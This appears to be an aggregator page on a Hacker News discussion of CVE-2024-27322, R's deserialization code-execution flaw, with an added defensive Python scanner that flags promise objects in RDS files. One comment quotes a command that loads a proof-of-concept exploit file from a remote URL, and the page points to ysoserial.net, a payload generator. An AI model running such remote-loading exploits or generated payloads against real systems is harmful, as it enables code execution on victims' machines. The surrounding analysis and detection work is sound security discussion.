Statement on CVE-2024-27322

This page summarizes the projects mentioned and recommended in the original post on news.ycombinator.com

  • rdaradar

    ☢️ Safety Radar for RDA Files

  • > We reject the idea that there are wider security implications associated with promises or serialization, both of which are core features of the language.

    Isn't this demonstrably false? I.e., run this [1]

    load(url("https://github.com/hrbrmstr/rdaradar/raw/main/exploit.rda"))

    and it opens the calculator application on Windows/macOS (or echoes 'pwnd' on Linux).

    To me, if someone can easily cause their code to run on my computer, that's a pretty serious vulnerability. read.csv() or fromJSON() do not allow this.

    I happen to have packages on CRAN that readRDS() from AWS S3. So if I happen to be evil and make some trivial alterations to those RDS files to contain a hidden payload, well, it's child's play. That does not seem sane to me.

    FWIW, my recommendation is that CRAN should create a function like readRDS() that only ever reads in data and does not allow any extra code to be run, then only allow that on CRAN. Then if someone did craft a malicious payload, it wouldn't matter. The (harder) alternative would be to disallow any functions that have this remote code execution 'feature', e.g., allow only read.csv() or fromJSON() and similar.

    [1] https://rud.is/b/2024/05/03/cve-2024-27322-should-never-have...
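The check the comment asks for, as an added example in the spirit of rdaradar (this is editorial example code, not rdaradar's code nor the commenter's, and it has not been run against exploit.rda): a small Python walker over R's XDR serialization, the format saveRDS()/save() write, that counts the object types present, flags PROMSXP, and fails closed on anything it does not understand. Type codes and field order follow R's serialize.c; the two sample streams at the bottom are hand-packed for the test, and the PROMSXP one carries a harmless cat("hi") call rather than a payload.

```python
"""Fail-closed scanner for R XDR serializations: reports code-carrying objects,
above all PROMSXP, the promise objects CVE-2024-27322 is about.
Added example, not rdaradar's code; layout follows R's serialize.c."""
import gzip
import struct

# SEXP type codes (Rinternals.h) plus the pseudo-types serialize.c emits.
PROMSXP, CLOSXP, LANGSXP = 5, 3, 6
CODE_TYPES = {PROMSXP: "PROMSXP", CLOSXP: "CLOSXP", LANGSXP: "LANGSXP"}
PAIRLIST_TYPES = {2, 3, 5, 6, 17}   # LISTSXP CLOSXP PROMSXP LANGSXP DOTSXP: ATTRIB, TAG, CAR, CDR
SINGLETONS = {254, 253, 252, 251, 250, 242, 241}  # NILVALUE GLOBALENV UNBOUND MISSINGARG BASENS EMPTYENV BASEENV


class RdsScanner:
    def __init__(self, data):
        if data[:2] == b"\x1f\x8b":                     # saveRDS() gzips by default
            data = gzip.decompress(data)
        if data[:5] in (b"RDX2\n", b"RDX3\n"):          # save() prefixes the serialization with a magic line
            data = data[5:]
        if data[:2] != b"X\n":
            raise ValueError("not an XDR R serialization (ascii/native formats not handled)")
        self.buf, self.pos, self.refs, self.counts = data, 2, [], {}
        version = self.int32()
        self.int32(); self.int32()                      # writer R version, minimal reader version
        if version == 3:
            self.bytes(self.int32())                    # native encoding name, e.g. "UTF-8"
        elif version != 2:
            raise ValueError(f"unsupported serialization version {version}")

    def int32(self):
        (v,) = struct.unpack_from(">i", self.buf, self.pos)
        self.pos += 4
        return v

    def bytes(self, n):
        if self.pos + n > len(self.buf):
            raise ValueError("truncated stream")
        b = self.buf[self.pos:self.pos + n]
        self.pos += n
        return b

    def length(self):
        n = self.int32()
        if n == -1:                                     # long vector: length split across two ints
            n = (self.int32() << 32) | (self.int32() & 0xFFFFFFFF)
        return n

    def item(self):
        flags = self.int32()
        t = flags & 0xFF
        has_attr, has_tag = bool(flags & (1 << 9)), bool(flags & (1 << 10))
        if t in (239, 240):                             # ATTRLISTSXP / ATTRLANGSXP: pairlist with attributes
            t, has_attr = (2 if t == 239 else 6), True
        self.counts[t] = self.counts.get(t, 0) + 1
        if t == 255:                                    # REFSXP: back-reference to an earlier symbol/env
            idx = (flags >> 8) or self.int32()
            if not 1 <= idx <= len(self.refs):
                raise ValueError(f"dangling REFSXP index {idx}")
        elif t in SINGLETONS:
            pass
        elif t == 1:                                    # SYMSXP: CHARSXP name, then registered as a ref
            self.item(); self.refs.append("sym")
        elif t == 4:                                    # ENVSXP: locked flag; registered before its children
            self.int32(); self.refs.append("env")
            for _ in range(4): self.item()              # enclos, frame, hashtab, attrib
        elif t in (248, 249):                           # PACKAGESXP / NAMESPACESXP: string vector of names
            self.int32()
            for _ in range(self.int32()): self.item()
            self.refs.append("ns")
        elif t == 238:                                  # ALTREP_SXP: class info, state, attributes
            for _ in range(3): self.item()
        elif t in PAIRLIST_TYPES:
            if has_attr: self.item()
            if has_tag: self.item()                     # for a PROMSXP the TAG is its environment
            self.item(); self.item()                    # CAR (promise value) then CDR (promise code)
        elif t == 9:                                    # CHARSXP: length (-1 = NA) then raw bytes, no attributes
            n = self.int32()
            if n >= 0: self.bytes(n)
        else:
            if t in (7, 8): self.bytes(self.int32())            # SPECIALSXP / BUILTINSXP: primitive name
            elif t in (10, 13): self.bytes(4 * self.length())   # LGLSXP / INTSXP
            elif t == 14: self.bytes(8 * self.length())         # REALSXP
            elif t == 15: self.bytes(16 * self.length())        # CPLXSXP
            elif t == 24: self.bytes(self.length())             # RAWSXP
            elif t in (16, 19, 20):                             # STRSXP / VECSXP / EXPRSXP: nested items
                for _ in range(self.length()): self.item()
            elif t != 25:                                       # S4SXP carries only attributes
                raise ValueError(f"unsupported SEXP type {t} at offset {self.pos - 4}; refusing to guess")
            if has_attr: self.item()                            # vector attributes follow the data


def scan(data):
    """Walk the whole stream and report which code-carrying object types it holds."""
    s = RdsScanner(data)
    s.item()
    if s.pos != len(s.buf):
        raise ValueError("trailing bytes after the serialized object")
    found = {CODE_TYPES[t]: n for t, n in s.counts.items() if t in CODE_TYPES}
    return {"has_promise": PROMSXP in s.counts, "code_objects": found, "items": sum(s.counts.values())}


# Constructed samples: hand-packed here for the test, not real saveRDS() output.
def _i(v): return struct.pack(">i", v)
def _chr(b): return _i(0x00040009) + _i(len(b)) + b     # ASCII CHARSXP (gp bits carry the ASCII flag)
def _sym(b): return _i(1) + _chr(b)
HEADER = b"X\n" + _i(3) + _i(262913) + _i(131840) + _i(5) + b"UTF-8"   # v3, written by R 4.3.1, needs >= 2.3.0
BENIGN = HEADER + _i(13) + _i(2) + _i(1) + _i(2)        # c(1L, 2L)
# PROMSXP with TAG=.GlobalEnv, value unbound, code = the call cat("hi"): harmless here, but R
# runs the promise code when the loaded value is first forced, which is the CVE's mechanism.
PROMISE = (HEADER + _i(5 | (1 << 10)) + _i(253) + _i(252)
           + _i(6) + _sym(b"cat") + _i(2) + _i(16) + _i(1) + _chr(b"hi") + _i(254))
GZIPPED_PROMISE = gzip.compress(PROMISE)

if __name__ == "__main__":
    for name, blob in (("benign", BENIGN), ("promise", PROMISE), ("promise.gz", GZIPPED_PROMISE)):
        print(name, scan(blob))
```

Treat PROMSXP as a hard reject. CLOSXP and LANGSXP occur legitimately (model objects, formulas), so for those the question is whether a data file from that source should carry code at all. The walker is deliberately strict: a bytecode object, external pointer or any unknown type raises instead of being skipped, because skipping unknown bytes is exactly how a hidden object would get past a scanner.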

  • ysoserial.net

    Deserialization payload generator for a variety of .NET formatters

    I was thinking of BinaryFormatter, NetDataContractSerializer, etc.: unsafe .NET object deserialization. I don't mean JSON, that's right, lmao.

    https://github.com/pwntester/ysoserial.net
